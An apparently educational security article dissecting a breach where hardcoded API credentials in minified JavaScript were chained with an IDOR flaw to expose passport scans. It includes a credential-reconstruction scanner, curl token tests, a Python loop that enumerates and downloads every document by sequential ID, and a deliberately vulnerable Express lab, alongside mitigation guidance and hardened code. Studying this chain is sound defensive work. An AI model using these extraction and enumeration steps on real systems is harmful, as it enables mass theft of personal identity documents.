
Introduction:
In a recent real‑world incident, a security researcher discovered over 70,000 passport scans exposed through a seemingly secure web application. The breach was not the result of a single critical vulnerability, but a chain of two medium‑severity issues: hardcoded API credentials hidden inside a minified JavaScript bundle, combined with an Insecure Direct Object Reference (IDOR) that allowed unauthorized access to any user’s documents. This case highlights how client‑side code can become a backdoor when secrets are improperly embedded, and how seemingly harmless information leaks can be chained into a massive data breach.
Learning Objectives:
- Recognize how API keys and secrets can be inadvertently exposed in minified front‑end JavaScript.
- Learn step‑by‑step techniques to deobfuscate, analyze, and extract hidden credentials from client‑side code.
- Understand how to identify and exploit IDOR vulnerabilities in APIs by chaining leaked metadata.
- Implement secure coding practices to prevent hardcoded secrets and enforce proper authorization checks.
You Should Know:
1. The Hidden Danger in Minified JavaScript
Modern web applications often deliver large bundles of minified JavaScript. Minification improves load time, but it also hides sensitive values that developers accidentally leave in the code, and it hides them only from casual readers, not from anyone who pretty-prints the bundle. In the case described, the researcher noticed a JavaScript bundle that loaded only under specific session conditions, a subtle indicator that the bundle contained privileged logic.
Step‑by‑step guide to analyze minified JavaScript:
- Identify the bundle – Use browser developer tools (F12) → Network tab, filter by “JS”. Look for scripts loaded conditionally (e.g., only after a specific redirect or query parameter).
- Retrieve the file – Copy the URL and download it locally:
curl -O https://target.com/js/unique-bundle.js
- Prettify the code – Use tools like `js-beautify` or online formatters:
npm install -g js-beautify
js-beautify unique-bundle.js > beautified.js
- Search for patterns – Grep case-insensitively for common keywords such as apiKey, secret, token, Authorization and Bearer, and for `const`/`let` declarations with suspicious literal values (without `-i`, a camel-cased `apiKey` would not match the pattern below):
grep -inE "(api[_-]?key|secret|token|Authorization|Bearer)" beautified.js
- Manual review – Look for code that concatenates string constants. In the incident, three constants scattered through the bundle were pieced together to form a valid API header. Example vulnerable pattern:
```javascript
const part1 = "a1b2c3";
const part2 = "d4e5f6";
const part3 = "g7h8i9";
const authHeader = "Bearer " + part1 + part2 + part3;
```
2. Extracting API Credentials from Client‑Side Code
Once a suspicious string is found, validate if it’s indeed a working credential. Attackers often copy the constructed header and test it against the API endpoints discovered earlier during reconnaissance.
Step‑by‑step extraction and validation:
- Reconstruct the credential – In the beautified code, locate the exact concatenation logic. Use the browser console to run the snippet and output the final value.
- Identify API endpoints – Review network traffic while interacting with the application to capture API calls. Look for requests made after authentication that might use this credential.
- Test the credential – Using `curl` or Postman, send a request to a known endpoint:
curl -H "Authorization: Bearer YOUR_EXTRACTED_TOKEN" https://api.target.com/v1/user/profile
- Automate with Burp Suite – Configure Burp to intercept requests, then use the “Match and Replace” rule to automatically add the extracted header for all requests, helping you explore the API’s attack surface.
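The reconstruction step in sections 1 and 2 can be done statically instead of pasting bundle code into the browser console. The following is an added example, not code from the article: a dependency-free scanner that collects `name = <expr>` assignments whose right-hand side is only string literals and identifiers joined by `+`, resolves them by substitution, and reports values that look like credentials or API base URLs. The bundle text and the identifier names in it (p1, hdr, base, profile) are constructed for the example.

```javascript
// Added example (not the article's code): static reconstruction of secrets that a
// minified bundle assembles from scattered string constants. The bundle is never
// executed; assignments are parsed with regular expressions and resolved by
// substitution. Heuristic by design: it handles `x = "lit" + y + 'lit'` chains,
// not template literals, function calls or scope-shadowed names.

// Constructed bundle fragment standing in for the beautified target file.
const SAMPLE_BUNDLE = `
var p1="a1b2c3";const p2='d4e5f6',p3="g7h8i9";let hdr="Bearer "+p1+p2+p3;
const base="https://api.target.com/v1",profile=base+"/user/profile";
fetch(profile,{headers:{Authorization:hdr}}).then(r=>r.json());
`;

// One operand: a double-quoted literal, a single-quoted literal, or an identifier.
const OPERAND = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[A-Za-z_$][\w$]*/;
const TOKEN_RE = new RegExp(OPERAND.source, "g");
// name = operand (+ operand)*   -- the only assignment shape we try to resolve.
const ASSIGN_RE = new RegExp(
  `([A-Za-z_$][\\w$]*)\\s*=\\s*((?:${OPERAND.source})(?:\\s*\\+\\s*(?:${OPERAND.source}))*)`,
  "g"
);

// Map of name -> operand tokens. Minified code reuses short names across
// scopes; the last assignment wins, which is good enough for triage.
function parseAssignments(src) {
  const assigns = new Map();
  for (const m of src.matchAll(ASSIGN_RE)) assigns.set(m[1], m[2].match(TOKEN_RE) || []);
  return assigns;
}

// Strip quotes and decode the common escapes (\n, \t, \r, \", \').
function unquote(lit) {
  return lit.slice(1, -1).replace(/\\(.)/g, (_, c) => ({ n: "\n", t: "\t", r: "\r" }[c] ?? c));
}

// Resolve every assignment to a concrete string; names that depend on an
// unknown or cyclic identifier are dropped rather than guessed.
function resolveConstants(src) {
  const assigns = parseAssignments(src);
  const cache = new Map();
  function resolve(name, stack) {
    if (cache.has(name)) return cache.get(name);
    if (!assigns.has(name) || stack.has(name)) return null;
    stack.add(name);
    let out = "";
    for (const tok of assigns.get(name)) {
      if (tok[0] === '"' || tok[0] === "'") { out += unquote(tok); continue; }
      const v = resolve(tok, stack);
      if (v === null) { out = null; break; }
      out += v;
    }
    stack.delete(name);
    cache.set(name, out);
    return out;
  }
  const result = {};
  for (const name of assigns.keys()) {
    const v = resolve(name, new Set());
    if (v !== null) result[name] = v;
  }
  return result;
}

const NAME_HINT = /key|secret|token|auth|pass|bearer/i;            // unminified names
const VALUE_HINT = /^(Bearer|Basic)\s+\S+|^[A-Za-z0-9_\-]{20,}$/;  // header or long opaque blob
const URL_HINT = /^https?:\/\//i;

// Resolved values that look like credentials, with the reason they were flagged.
function findCandidateSecrets(src) {
  const out = [];
  for (const [name, value] of Object.entries(resolveConstants(src))) {
    const reasons = [];
    if (NAME_HINT.test(name)) reasons.push("name");
    if (VALUE_HINT.test(value)) reasons.push("value");
    if (reasons.length) out.push({ name, value, reasons });
  }
  return out;
}

// Resolved values that look like endpoints: where to test a recovered credential.
function findEndpoints(src) {
  return Object.values(resolveConstants(src)).filter((v) => URL_HINT.test(v));
}

console.log(JSON.stringify({ secrets: findCandidateSecrets(SAMPLE_BUNDLE), endpoints: findEndpoints(SAMPLE_BUNDLE) }, null, 2));
```

Run it against `beautified.js` by reading the file into `resolveConstants` instead of the constructed sample; the value-based hint is the one that matters on real bundles, since minifiers rename `part1` to single letters but leave string literals intact.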
3. Chaining with IDOR: From Credentials to Data Breach
In the original incident, the API credentials alone were not enough because document references used unpredictable UUIDs. However, a search endpoint revealed internal numeric IDs in its metadata—a classic IDOR vector. By chaining the leaked IDs, the attacker could fetch any document without ownership verification.
Step‑by‑step IDOR exploitation chain:
- Map the API – With valid credentials, enumerate all endpoints. Use tools like `ffuf` or Burp Intruder to fuzz common paths (/api/v1/documents, /api/v1/users, /api/v1/search).
- Analyze responses – Look for fields that shouldn't be exposed, such as internal_id, owner_id, or document_id values that differ from the public UUID.
- Extract the seed – In the described case, the search endpoint returned a list of results with a hidden metadata field containing an internal numeric ID.
- Test IDOR – Use that ID to access the document endpoint directly:
curl -H "Authorization: Bearer TOKEN" "https://api.target.com/v1/documents/INTERNAL_ID"
- Automate enumeration – Once a pattern is confirmed (e.g., sequential IDs), write a Python script to iterate and download all documents:
```python
import requests

headers = {"Authorization": "Bearer TOKEN"}
for i in range(1, 100000):
    r = requests.get(f"https://api.target.com/v1/documents/{i}", headers=headers, timeout=10)
    if r.status_code == 200:
        print(f"Found document {i}")
        with open(f"{i}.pdf", "wb") as f:
            f.write(r.content)
```
4. Mitigation: Preventing Hardcoded Credentials and IDOR
To avoid similar breaches, development teams must adopt secure coding practices that treat client‑side code as untrusted.
Never store secrets client‑side – API keys, tokens, or any sensitive credentials should reside only on the server. If an API must be called from the frontend, use a backend proxy or implement OAuth flows with short‑lived, scope‑limited tokens.
Enforce authorization on every request – Server‑side checks must ensure that the authenticated user is permitted to access the requested resource. Never rely on client‑side hiding of IDs. Use randomly generated UUIDs for resources, but still validate ownership.
Step‑by‑step hardening guide:
- Remove secrets from frontend – Scan your codebase with tools like `truffleHog` or `git-secrets` to detect accidental commits of secrets, and scan the built bundle as well, since a secret can enter through a build-time environment variable without ever appearing in source:
trufflehog filesystem ./src ./dist
- Implement proper CORS and CSRF protections – Limit which origins a browser may call your API from and enforce anti‑CSRF tokens for state‑changing operations. Note that CORS is enforced only by browsers; it does nothing against `curl` or a script holding a leaked token, so it complements server‑side authorization rather than replacing it.
- Use API gateways – Route all frontend API calls through a gateway that injects the necessary authentication headers, keeping secrets off the client.
- Perform IDOR testing – During development, use automated scanners (e.g., OWASP ZAP, Burp Scanner) to test for missing authorization checks. Include negative test cases in your CI/CD pipeline.
5. Practical Lab: Simulating the Attack
To fully understand the chain, set up a minimal vulnerable environment and practice both discovery and exploitation.
Lab setup (Linux/macOS with Node.js):
- Create a simple Express server with a vulnerable API:
```javascript
const express = require('express');
const app = express();

const validToken = "a1b2c3d4e5f6"; // hardcoded secret

// Mock document store
const documents = {
  1: { owner: "user1", content: "Passport scan 1" },
  2: { owner: "user2", content: "Passport scan 2" }
};

app.get('/api/docs/:id', (req, res) => {
  const token = req.headers.authorization;
  if (token !== `Bearer ${validToken}`) return res.status(401).send();
  const doc = documents[req.params.id];
  if (!doc) return res.status(404).send();
  // Missing ownership check!
  res.json(doc);
});

app.listen(3000);
```
- In a separate file, embed the token in a script served to clients:
```javascript
const part1 = "a1b2c3";
const part2 = "d4e5f6";
const apiKey = part1 + part2;
```
Minify it with `terser` and serve it.
- Follow the deobfuscation steps, extract the token, then call /api/docs/1, /api/docs/2, etc. to see how the missing ownership check lets one shared token read every document.
Fix: Remove the hardcoded token, authenticate users with a server‑side session, and compare the document's owner with the session user before returning it:
```javascript
if (doc.owner !== req.session.userId) return res.status(403).send();
```
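To see the lab's fix and section 4's "enforce authorization on every request" side by side without standing up a server, here is an added example (not the article's lab code) that writes both handlers as plain functions with an Express‑shaped request object and runs the enumeration sweep against each. The document store, user names and shared token are constructed for the example.

```javascript
// Added example (not from the article): the lab's vulnerable handler beside the
// hardened one, as dependency-free functions of (req) -> { status, body }, plus
// the id sweep from section 3 run in-process against each. All data constructed.

const SHARED_TOKEN = "a1b2c3d4e5f6"; // the client-visible secret from the lab bundle
const documents = {
  1: { owner: "user1", content: "Passport scan 1" },
  2: { owner: "user2", content: "Passport scan 2" },
  3: { owner: "user2", content: "Passport scan 3" },
};

// Own-property lookup only: a plain `documents[id]` would return Object.prototype
// members for ids like "constructor" and hand them to res.json().
function lookup(id) {
  return Object.prototype.hasOwnProperty.call(documents, id) ? documents[id] : undefined;
}

// Vulnerable: one shared bearer token says nothing about *who* is asking,
// so there is no identity to compare the document's owner against.
function getDocVulnerable(req) {
  if (req.headers.authorization !== `Bearer ${SHARED_TOKEN}`) return { status: 401 };
  const doc = lookup(req.params.id);
  if (!doc) return { status: 404 };
  return { status: 200, body: doc }; // missing ownership check
}

// Hardened: identity comes from a server-side session established at login
// (never shipped in a bundle), and every request checks ownership against it.
function getDocSecure(req) {
  const userId = req.session && req.session.userId;
  if (!userId) return { status: 401 };
  const doc = lookup(req.params.id);
  if (!doc) return { status: 404 };
  if (doc.owner !== userId) return { status: 403 }; // the article's fix
  return { status: 200, body: doc };
}

// The enumeration loop from section 3, run against a handler instead of HTTP.
function sweep(handler, makeReq, maxId) {
  const found = [];
  for (let id = 1; id <= maxId; id++) {
    if (handler(makeReq(String(id))).status === 200) found.push(id);
  }
  return found;
}

// Request builders: the attacker holds only the leaked token; real users have sessions.
const attackerReq = (id) => ({ headers: { authorization: `Bearer ${SHARED_TOKEN}` }, params: { id } });
const user1Req = (id) => ({ headers: {}, params: { id }, session: { userId: "user1" } });
const user2Req = (id) => ({ headers: {}, params: { id }, session: { userId: "user2" } });

console.log("vulnerable, leaked token:", sweep(getDocVulnerable, attackerReq, 10)); // every document
console.log("hardened, leaked token:  ", sweep(getDocSecure, attackerReq, 10));     // nothing
console.log("hardened, user2 session: ", sweep(getDocSecure, user2Req, 10));        // only user2's
```

One refinement worth considering over the article's 403: answering 404 for a document the caller does not own avoids confirming that the internal ID exists, which removes the oracle an enumerator uses to map the ID space even after the ownership check is in place.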
6. Lessons from the Real‑World Breach
The original researcher spent weeks on reconnaissance, not because the vulnerabilities were complex, but because they were hidden in plain sight. The key takeaways from this incident:
- Surface‑level testing is insufficient – Dynamic scanners often miss client‑side secrets and logical flaws like IDOR. Manual code review and behavioral analysis are essential.
- Chaining elevates impact – Two “medium” vulnerabilities combined can lead to critical data exposure. Bug bounty programs should reward such chains appropriately.
- Minification is not security – Developers sometimes mistakenly believe that minification or obfuscation protects secrets. It does not; it only delays discovery.
What Undercode Say:
- Key Takeaway 1: Hardcoded credentials in JavaScript bundles are a pervasive problem. Even when split across constants, they can be reconstructed with minimal effort using developer tools.
- Key Takeaway 2: IDOR vulnerabilities remain one of the most common and dangerous API flaws. They often go undetected because they require context—like knowing an internal ID—that attackers can obtain from other endpoints.
- Analysis: This incident demonstrates the importance of treating the frontend as a public asset. Any data or logic placed client‑side must be considered exposed. Moreover, it underscores that proper access control is not just about hiding IDs; it’s about verifying ownership on every server‑side request. The combination of leaked credentials and missing authorization checks created a perfect storm. Organizations should adopt a defense‑in‑depth strategy that includes static analysis for secrets, regular penetration testing, and strict API authorization models.
Prediction:
As more applications move logic to the client for performance and interactivity, the attack surface for client‑side secrets will expand. We can expect an increase in breaches originating from poorly secured JavaScript bundles, prompting a shift toward server‑side rendering of sensitive components and the wider adoption of Backend‑for‑Frontend (BFF) patterns that keep secrets out of the browser. Additionally, regulatory bodies may begin to mandate stricter controls on how APIs handle personally identifiable information (PII), making IDOR a compliance as well as a security concern. Tools that automatically detect and block IDOR attacks at runtime will become more prevalent, as will automated secret‑scanning in CI/CD pipelines.
Reported By: Xavi Marquez – Hackers Feeds


